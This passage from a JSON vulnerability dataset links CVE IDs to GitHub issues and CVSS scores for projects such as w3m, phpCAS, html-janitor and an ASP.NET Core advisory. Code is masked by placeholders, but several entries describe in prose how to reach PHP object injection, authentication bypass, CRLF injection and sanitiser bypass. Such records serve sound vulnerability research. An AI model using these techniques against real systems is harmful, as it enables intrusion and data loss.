  4251. "exploitabilityScore": 2.8
  4252. },
  4253. {
  4254. "CVE_ID": "CVE-2016-9625",
  4255. "Issue_Url_old": "https://github.com/tats/w3m/issues/36",
  4256. "Issue_Url_new": "https://github.com/tats/w3m/issues/36",
  4257. "Repo_new": "tats/w3m",
  4258. "Issue_Created_At": "2016-11-07T08:54:01Z",
  4259. "description": "APITAG infinite recursion. input CODETAG APITAG CODETAG found by afl fuzz",
  4260. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4261. "severity": "MEDIUM",
  4262. "baseScore": 6.5,
  4263. "impactScore": 3.6,
  4264. "exploitabilityScore": 2.8
  4265. },
  4266. {
  4267. "CVE_ID": "CVE-2016-9626",
  4268. "Issue_Url_old": "https://github.com/tats/w3m/issues/37",
  4269. "Issue_Url_new": "https://github.com/tats/w3m/issues/37",
  4270. "Repo_new": "tats/w3m",
  4271. "Issue_Created_At": "2016-11-07T15:41:45Z",
  4272. "description": "infinite recursion in APITAG CODETAG APITAG CODETAG found by afl fuzz",
  4273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4274. "severity": "MEDIUM",
  4275. "baseScore": 6.5,
  4276. "impactScore": 3.6,
  4277. "exploitabilityScore": 2.8
  4278. },
  4279. {
  4280. "CVE_ID": "CVE-2016-9627",
  4281. "Issue_Url_old": "https://github.com/tats/w3m/issues/38",
  4282. "Issue_Url_new": "https://github.com/tats/w3m/issues/38",
  4283. "Repo_new": "tats/w3m",
  4284. "Issue_Created_At": "2016-11-13T16:02:08Z",
  4285. "description": "heap buffer overflow and bad pointer deref in APITAG input CODETAG APITAG ERRORTAG symbol is allocated in APITAG . Its size is only NUMBERTAG So APITAG is heap buffer overflow read.",
  4286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4287. "severity": "MEDIUM",
  4288. "baseScore": 6.5,
  4289. "impactScore": 3.6,
  4290. "exploitabilityScore": 2.8
  4291. },
  4292. {
  4293. "CVE_ID": "CVE-2016-9628",
  4294. "Issue_Url_old": "https://github.com/tats/w3m/issues/39",
  4295. "Issue_Url_new": "https://github.com/tats/w3m/issues/39",
  4296. "Repo_new": "tats/w3m",
  4297. "Issue_Created_At": "2016-11-13T16:18:19Z",
  4298. "description": "null pointer deref due to bad form id in APITAG input CODETAG APITAG ERRORTAG I found form is obtained by APITAG earlier CODETAG Although the value of APITAG is validated but APITAG is incorrectly obtained from user input.",
  4299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4300. "severity": "MEDIUM",
  4301. "baseScore": 6.5,
  4302. "impactScore": 3.6,
  4303. "exploitabilityScore": 2.8
  4304. },
  4305. {
  4306. "CVE_ID": "CVE-2016-9629",
  4307. "Issue_Url_old": "https://github.com/tats/w3m/issues/40",
  4308. "Issue_Url_new": "https://github.com/tats/w3m/issues/40",
  4309. "Repo_new": "tats/w3m",
  4310. "Issue_Created_At": "2016-11-15T06:48:21Z",
  4311. "description": "deref null pointer in APITAG input CODETAG CODETAG found by afl fuzz",
  4312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4313. "severity": "MEDIUM",
  4314. "baseScore": 6.5,
  4315. "impactScore": 3.6,
  4316. "exploitabilityScore": 2.8
  4317. },
  4318. {
  4319. "CVE_ID": "CVE-2016-9630",
  4320. "Issue_Url_old": "https://github.com/tats/w3m/issues/41",
  4321. "Issue_Url_new": "https://github.com/tats/w3m/issues/41",
  4322. "Repo_new": "tats/w3m",
  4323. "Issue_Created_At": "2016-11-17T05:21:37Z",
  4324. "description": "global buffer overflow in APITAG input CODETAG build with Address sanitizer. the run result: ERRORTAG CODETAG APITAG NUMBERTAG ERRORTAG , but length of APITAG is NUMBERTAG or NUMBERTAG",
  4325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4326. "severity": "MEDIUM",
  4327. "baseScore": 6.5,
  4328. "impactScore": 3.6,
  4329. "exploitabilityScore": 2.8
  4330. },
  4331. {
  4332. "CVE_ID": "CVE-2016-9631",
  4333. "Issue_Url_old": "https://github.com/tats/w3m/issues/42",
  4334. "Issue_Url_new": "https://github.com/tats/w3m/issues/42",
  4335. "Repo_new": "tats/w3m",
  4336. "Issue_Created_At": "2016-11-17T07:06:48Z",
  4337. "description": "null pointer defer in APITAG input CODETAG APITAG CODETAG",
  4338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4339. "severity": "MEDIUM",
  4340. "baseScore": 6.5,
  4341. "impactScore": 3.6,
  4342. "exploitabilityScore": 2.8
  4343. },
  4344. {
  4345. "CVE_ID": "CVE-2016-9632",
  4346. "Issue_Url_old": "https://github.com/tats/w3m/issues/43",
  4347. "Issue_Url_new": "https://github.com/tats/w3m/issues/43",
  4348. "Repo_new": "tats/w3m",
  4349. "Issue_Created_At": "2016-11-18T01:53:54Z",
  4350. "description": "global buffer overflow in APITAG CODETAG how to reproduce NUMBERTAG build w3m with APITAG URLTAG ( APITAG NUMBERTAG APITAG Asan output ERRORTAG ERRORTAG CODETAG map is APITAG , which is size NUMBERTAG",
  4351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4352. "severity": "MEDIUM",
  4353. "baseScore": 6.5,
  4354. "impactScore": 3.6,
  4355. "exploitabilityScore": 2.8
  4356. },
  4357. {
  4358. "CVE_ID": "CVE-2016-9633",
  4359. "Issue_Url_old": "https://github.com/tats/w3m/issues/23",
  4360. "Issue_Url_new": "https://github.com/tats/w3m/issues/23",
  4361. "Repo_new": "tats/w3m",
  4362. "Issue_Created_At": "2016-08-19T17:38:40Z",
  4363. "description": "memory exhausted due to repeat appending \" APITAG \". ERRORTAG gdb ERRORTAG Two issues NUMBERTAG why w3m repeat appending APITAG to the buffer NUMBERTAG newlen integer overflow in Strgrow and to allocate huge buffer. found by afl fuzz",
  4364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4365. "severity": "MEDIUM",
  4366. "baseScore": 6.5,
  4367. "impactScore": 3.6,
  4368. "exploitabilityScore": 2.8
  4369. },
  4370. {
  4371. "CVE_ID": "CVE-2016-9751",
  4372. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/559",
  4373. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/559",
  4374. "Repo_new": "piwigo/piwigo",
  4375. "Issue_Created_At": "2016-11-29T13:38:51Z",
  4376. "description": "[security] quick search and criteria display. We need to sanitize search criteria used in quick search before displaying on FILETAG page.",
  4377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4378. "severity": "MEDIUM",
  4379. "baseScore": 6.1,
  4380. "impactScore": 2.7,
  4381. "exploitabilityScore": 2.8
  4382. },
  4383. {
  4384. "CVE_ID": "CVE-2016-9835",
  4385. "Issue_Url_old": "https://github.com/zikula/core/issues/3237",
  4386. "Issue_Url_new": "https://github.com/zikula/core/issues/3237",
  4387. "Repo_new": "zikula/core",
  4388. "Issue_Created_At": "2016-12-03T03:06:43Z",
  4389. "description": "APITAG file read vulnerability (windows environment). relative codes in APITAG : ERRORTAG On windows platform we can bypass regex filter with APITAG APITAG APITAG the result of APITAG was brought into ERRORTAG , when APITAG is used on user supplied data it often leads to PHP Object Injection . here we can launch further attacks with APITAG in APITAG . APITAG delete files on windows server. Add a public func in class APITAG ERRORTAG Serialize an APITAG object and write it to file: APITAG FILETAG CODETAG Upload APITAG to APITAG folder on windows server. Then request APITAG , and your target file will be deleted. ( APITAG in my test).",
  4390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4391. "severity": "CRITICAL",
  4392. "baseScore": 9.8,
  4393. "impactScore": 5.9,
  4394. "exploitabilityScore": 3.9
  4395. },
  4396. {
  4397. "CVE_ID": "CVE-2016-9933",
  4398. "Issue_Url_old": "https://github.com/libgd/libgd/issues/215",
  4399. "Issue_Url_new": "https://github.com/libgd/libgd/issues/215",
  4400. "Repo_new": "libgd/libgd",
  4401. "Issue_Created_At": "2016-05-25T11:11:05Z",
  4402. "description": "APITAG stack overflow. Invalid color causes stack exhaustion by recursive call to function APITAG when the image used is not truecolor. Source code: URLTAG CODETAG CODETAG Test script: APITAG Expected result: No crash Actual result: ERRORTAG",
  4403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4404. "severity": "HIGH",
  4405. "baseScore": 7.5,
  4406. "impactScore": 3.6,
  4407. "exploitabilityScore": 3.9
  4408. },
  4409. {
  4410. "CVE_ID": "CVE-2016-9964",
  4411. "Issue_Url_old": "https://github.com/bottlepy/bottle/issues/913",
  4412. "Issue_Url_new": "https://github.com/bottlepy/bottle/issues/913",
  4413. "Repo_new": "bottlepy/bottle",
  4414. "Issue_Created_At": "2016-12-08T07:29:24Z",
  4415. "description": "APITAG doesn't filter \" \" leads to CRLF attack. Hi, APITAG doesn't filter \" \" which leads to CRLF attack. For example, I use APITAG can set a new cookie in the client side. :P",
  4416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  4417. "severity": "MEDIUM",
  4418. "baseScore": 6.5,
  4419. "impactScore": 3.6,
  4420. "exploitabilityScore": 2.8
  4421. },
  4422. {
  4423. "CVE_ID": "CVE-2017-0247",
  4424. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/239",
  4425. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/239",
  4426. "Repo_new": "aspnet/announcements",
  4427. "Issue_Created_At": "2017-05-09T17:13:10Z",
  4428. "description": "Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege . Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege Executive Summary Microsoft is releasing this security advisory to provide information about vulnerabilities in public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly. .NET Core & ASP.NET Core are the next generation of .NET that provide a familiar and modern framework for web and cloud scenarios. These products are actively developed by the .NET and ASP.NET team in collaboration with a community of open source developers, running on Windows, Mac OS X and Linux. When .NET Core was released, the version number was reset to NUMBERTAG to reflect the fact that it is a separate product from its predecessor .NET. Discussion To discuss the ASP.NET Core issues please see URLTAG To discuss the APITAG Core issues please see URLTAG Issue CVEs and Description CVE | Description | CVETAG CVETAG | Security Feature Bypass CVETAG CVETAG | Denial of Service CVETAG CVETAG | Escalation of Privilege CVETAG CVETAG | Spoofing Affected Software The vulnerabilities affect any Microsoft .NET Core project if it uses the following affected package versions. Package name | Package versions | Fixed package versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. If your project has a direct or transitive dependency on any of the packages and versions listed above, you are affected. Note: As part of patching ASP.NET Core MVC we update every APITAG package. If, for example, you have a dependency on APITAG you should update to the appropriate version first NUMBERTAG should be updated to NUMBERTAG should be updated to NUMBERTAG and it will also update any other vulnerable APITAG dependency. NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG You must ensure you follow the correct update instructions for your project type. Direct Dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by reviewing your APITAG or csproj file. Transitive Dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable in the Visual Studio Solution Explorer window, which supports searching, or by reviewing the APITAG file contained in the root directory of your project for APITAG projects or the APITAG file contained in the obj directory of your project for csproj projects. These files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. How do I fix my affected application? You will need to fix both direct dependencies and review and fix any transitive dependencies. The Affected Packages and Versions above should each vulnerable package, the vulnerable versions and the patched versions. Note : If you are using ASP.NET Core MVC in your projects you should first update the APITAG version according to the affected versions table above. If you are currently using version NUMBERTAG or NUMBERTAG you should update your package version to NUMBERTAG If you are using version NUMBERTAG or NUMBERTAG you should update your package version to NUMBERTAG This will update every MVC package to the fixed versions. Fixing Direct Dependencies \u2013 FILETAG /VS NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Fixing Direct Dependencies \u2013 csproj/VS NUMBERTAG Open your APITAG file in your editor, or right click the project in Visual Studio NUMBERTAG and choose APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an example project file: CODETAG The example has two direct package dependencies, as seen by the two APITAG elements. The name of the package is in the Include attribute, and the package version number is in the Version attribute that is exposed to the right of the package name. The example shows two packages APITAG version NUMBERTAG and APITAG version NUMBERTAG Review your APITAG elements for any instance of the packages and versions listed above. In the example above, there is a direct dependency on one of the vulnerable packages, APITAG version NUMBERTAG To update to the fixed package, change the version number to the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package version, save your csproj file. The example csproj would now look as follows: CODETAG If you are using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning, you must update your other direct dependencies to the appropriate version. For example if your project refers to APITAG with a version number of NUMBERTAG when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your csproj or APITAG in the same way that you used to update the vulnerable package versions. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. Reviewing Transitive Dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review your APITAG ( FILETAG /VS NUMBERTAG or APITAG (csproj/VS NUMBERTAG file. Using Visual Studio Solution Explorer (VS NUMBERTAG If you want to use Visual Studio NUMBERTAG open your project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. Search for each of the vulnerable package names and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a reference to APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see we have found references to APITAG , version NUMBERTAG ERRORTAG APITAG APITAG APITAG or .NET Framework vX.Y.Z ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In this case the APITAG package takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG ERRORTAG FILETAG APITAG FILETAG file to expand the solution tree to expose the FILETAG file. The following image shows a project with the FILETAG file expanded to show the FILETAG APITAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. For example a search result that shows APITAG APITAG APITAG APITAG FILETAG CODETAG FILETAG file to override the transitive dependency. Open your FILETAG CODETAG FILETAG file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG APITAG FILETAG APITAG APITAG file. If you are using Visual Studio save your updated APITAG CODETAG dotnet restore CODETAG APITAG in an example project that contains a package that takes a dependency on APITAG CODETAG APITAG ERRORTAG APITAG APITAG APITAG in turn has leaf nodes that list its dependencies and their versions. In the example the APITAG package takes a dependency on a version of APITAG which in turn takes a dependency on a vulnerable version of APITAG APITAG FILETAG ERRORTAG FILETAG file for each of the vulnerable packages, using the format APITAG APITAG / and compare to the vulnerable versions table above. For example a search result that shows APITAG APITAG APITAG APITAG FILETAG file includes references to any of the vulnerable packages shown above then you will need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open your APITAG APITAG APITAG from the content menu, where projectname is the name of your project. Look for APITAG CODETAG csproj file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG CODETAG csproj file. If you are using Visual Studio, save your updated csproj CODETAG dotnet restore` command to restore your new dependencies. Rebuilding your application Finally rebuild your application, test as you would do normally and redeploy using your favored deployment mechanism. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Revisions NUMBERTAG APITAG NUMBERTAG Advisory published.",
  4429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4430. "severity": "HIGH",
  4431. "baseScore": 7.5,
  4432. "impactScore": 3.6,
  4433. "exploitabilityScore": 3.9
  4434. },
  4435. {
  4436. "CVE_ID": "CVE-2017-0378",
  4437. "Issue_Url_old": "https://github.com/lota/phamm/issues/21",
  4438. "Issue_Url_new": "https://github.com/lota/phamm/issues/21",
  4439. "Repo_new": "lota/phamm",
  4440. "Issue_Created_At": "2017-07-19T23:59:54Z",
  4441. "description": "CVETAG reflected XSS. While looking through APITAG I noticed that phamm's FILETAG uses $_SERVER['PHP_SELF'] in a way that is vulnerable to reflected XSS attacks. To reproduce the problem, load a URL like this in Firefox: URLTAG The Debian Security team assigned this issue CVETAG",
  4442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4443. "severity": "MEDIUM",
  4444. "baseScore": 6.1,
  4445. "impactScore": 2.7,
  4446. "exploitabilityScore": 2.8
  4447. },
  4448. {
  4449. "CVE_ID": "CVE-2017-0898",
  4450. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3722",
  4451. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3722",
  4452. "Repo_new": "mruby/mruby",
  4453. "Issue_Created_At": "2017-06-26T18:16:07Z",
  4454. "description": "Heap use after free in mrb_str_format. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by URLTAG",
  4455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  4456. "severity": "CRITICAL",
  4457. "baseScore": 9.1,
  4458. "impactScore": 5.2,
  4459. "exploitabilityScore": 3.9
  4460. },
  4461. {
  4462. "CVE_ID": "CVE-2017-0904",
  4463. "Issue_Url_old": "https://github.com/jtdowney/private_address_check/issues/1",
  4464. "Issue_Url_new": "https://github.com/jtdowney/private_address_check/issues/1",
  4465. "Repo_new": "jtdowney/private_address_check",
  4466. "Issue_Created_At": "2017-11-07T10:54:06Z",
  4467. "description": "Resolv::getaddresses bug allows one to bypass your SSRF filter.. Description APITAG is OS dependent, therefore by playing around with different IP formats one can return blank values. This bug can be abused to bypass your exclusion list. | \ud83d\udcbb Machine NUMBERTAG Machine NUMBERTAG ruby NUMBERTAG p NUMBERTAG linux gnu] | ruby NUMBERTAG p NUMBERTAG linux gnu] | \ud83d\udcbb Machine NUMBERTAG CODETAG \ud83d\udcbb Machine NUMBERTAG CODETAG Proof of concept CODETAG Mitigation I suggest staying away from APITAG altogether and using the Socket class. APITAG",
  4468. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4469. "severity": "HIGH",
  4470. "baseScore": 8.1,
  4471. "impactScore": 5.9,
  4472. "exploitabilityScore": 2.2
  4473. },
  4474. {
  4475. "CVE_ID": "CVE-2017-0928",
  4476. "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/35",
  4477. "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/35",
  4478. "Repo_new": "guardian/html-janitor",
  4479. "Issue_Created_At": "2017-10-27T10:01:25Z",
  4480. "description": "Bypassing sanitization using DOM clobbering. Proof of concept: CODETAG The following check can be leveraged to bypass the whole sanitization process: APITAG As node is the first child in the created tree walker, i.e. in this case the APITAG tag, APITAG will point to the inner APITAG and the check passes. To learn more about DOM clobbering see: URLTAG (by Mario Heiderich)",
  4481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4482. "severity": "MEDIUM",
  4483. "baseScore": 6.1,
  4484. "impactScore": 2.7,
  4485. "exploitabilityScore": 2.8
  4486. },
  4487. {
  4488. "CVE_ID": "CVE-2017-0931",
  4489. "Issue_Url_old": "https://github.com/guardian/html-janitor/issues/34",
  4490. "Issue_Url_new": "https://github.com/guardian/html-janitor/issues/34",
  4491. "Repo_new": "guardian/html-janitor",
  4492. "Issue_Created_At": "2017-10-27T09:49:19Z",
  4493. "description": "Passing user controlled data to APITAG may lead to XSS. The following will result in JS execution: ERRORTAG because of this code: ERRORTAG This implies that passing untrusted user controlled data into the clean method can be very dangerous in some cases. The APITAG HTML\" descriptions seems to imply that \"dirty\" HTML is expected and therefore I would assume the clean method should never result in arbitrary JS being executed.",
  4494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4495. "severity": "MEDIUM",
  4496. "baseScore": 6.1,
  4497. "impactScore": 2.7,
  4498. "exploitabilityScore": 2.8
  4499. },
  4500. {
  4501. "CVE_ID": "CVE-2017-1000007",
  4502. "Issue_Url_old": "https://github.com/twisted/txaws/issues/24",
  4503. "Issue_Url_new": "https://github.com/twisted/txaws/issues/24",
  4504. "Repo_new": "twisted/txaws",
  4505. "Issue_Created_At": "2017-01-07T01:56:23Z",
  4506. "description": "security placeholder.",
  4507. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4508. "severity": "MEDIUM",
  4509. "baseScore": 5.9,
  4510. "impactScore": 3.6,
  4511. "exploitabilityScore": 2.2
  4512. },
  4513. {
  4514. "CVE_ID": "CVE-2017-1000048",
  4515. "Issue_Url_old": "https://github.com/ljharb/qs/issues/200",
  4516. "Issue_Url_new": "https://github.com/ljharb/qs/issues/200",
  4517. "Repo_new": "ljharb/qs",
  4518. "Issue_Created_At": "2017-03-02T11:19:08Z",
  4519. "description": "prototype override protection bypass problem still exists.. as the bug URLTAG report fixed, but the other bypass APITAG still exists.",
  4520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4521. "severity": "HIGH",
  4522. "baseScore": 7.5,
  4523. "impactScore": 3.6,
  4524. "exploitabilityScore": 3.9
  4525. },
  4526. {
  4527. "CVE_ID": "CVE-2017-1000056",
  4528. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/43459",
  4529. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/43459",
  4530. "Repo_new": "kubernetes/kubernetes",
  4531. "Issue_Created_At": "2017-03-21T15:22:29Z",
  4532. "description": "placeholder. placeholder",
  4533. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4534. "severity": "CRITICAL",
  4535. "baseScore": 9.8,
  4536. "impactScore": 5.9,
  4537. "exploitabilityScore": 3.9
  4538. },
  4539. {
  4540. "CVE_ID": "CVE-2017-1000070",
  4541. "Issue_Url_old": "https://github.com/bitly/oauth2_proxy/issues/228",
  4542. "Issue_Url_new": "https://github.com/bitly/oauth2_proxy/issues/228",
  4543. "Repo_new": "bitly/oauth2_proxy",
  4544. "Issue_Created_At": "2016-03-26T16:07:36Z",
  4545. "description": "'/' redirect check isn't enough.. PATHTAG is a valid url, so the redirect check at APITAG is not sufficient for its intent. Since I'm using this hole to redirect to other domains within a set of subdomains it would be cool if this was somehow preserved so I can have a partially open redirect. (I'm using an 'auth' domain and redirect to it from other domains and then redirect back while using the nginx aut I plan on writing up the configuration soon for others to use.)",
  4546. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4547. "severity": "MEDIUM",
  4548. "baseScore": 6.1,
  4549. "impactScore": 2.7,
  4550. "exploitabilityScore": 2.8
  4551. },
  4552. {
  4553. "CVE_ID": "CVE-2017-1000071",
  4554. "Issue_Url_old": "https://github.com/Jasig/phpCAS/issues/228",
  4555. "Issue_Url_new": "https://github.com/apereo/phpcas/issues/228",
  4556. "Repo_new": "apereo/phpcas",
  4557. "Issue_Created_At": "2017-04-06T14:17:04Z",
  4558. "description": "Authentication bypass in APITAG Hello, I found a way to abuse failure message from old CAS server to bypass authentication, even if latest APITAG is used. The CAS NUMBERTAG alidation function is like this: ERRORTAG A normal APITAG message is like this: CODETAG In old CAS server version, it was possible to inject xml tag in the ticket so that the failure message become: CODETAG Now check the php code above and guess what happens: authentication success! The authenticationfailure elements are ignored. Again, this is only possible when latest APITAG is configured to authenticate against old CAS server. Still, that does exist. Some other CAS clients might also be vulnerable, I didn't verify though.",
  4559. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4560. "severity": "HIGH",
  4561. "baseScore": 8.1,
  4562. "impactScore": 5.9,
  4563. "exploitabilityScore": 2.2
  4564. },
  4565. {
  4566. "CVE_ID": "CVE-2017-1000072",
  4567. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/123",
  4568. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/123",
  4569. "Repo_new": "marcobambini/gravity",
  4570. "Issue_Created_At": "2017-04-07T05:59:36Z",
  4571. "description": "Double Free Vulnerability . I found a Double Free vulnerability while fuzzing Gravity. I have attached the Valgrind output as well. FILETAG ASAN output: > $ PATHTAG PATHTAG > RUNTIME ERROR: Unable to find f2 into class foo NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG e NUMBERTAG in thread T NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG NUMBERTAG cc7 in gravity_class_free_core PATHTAG NUMBERTAG in gravity_core_free PATHTAG NUMBERTAG a9b1 in main PATHTAG NUMBERTAG f NUMBERTAG b5ef NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG > freed by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in gravity_class_free_internal PATHTAG > > previously allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e2 in string_dup PATHTAG > > SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING POC: 'WILL ADD' MENTIONTAG",
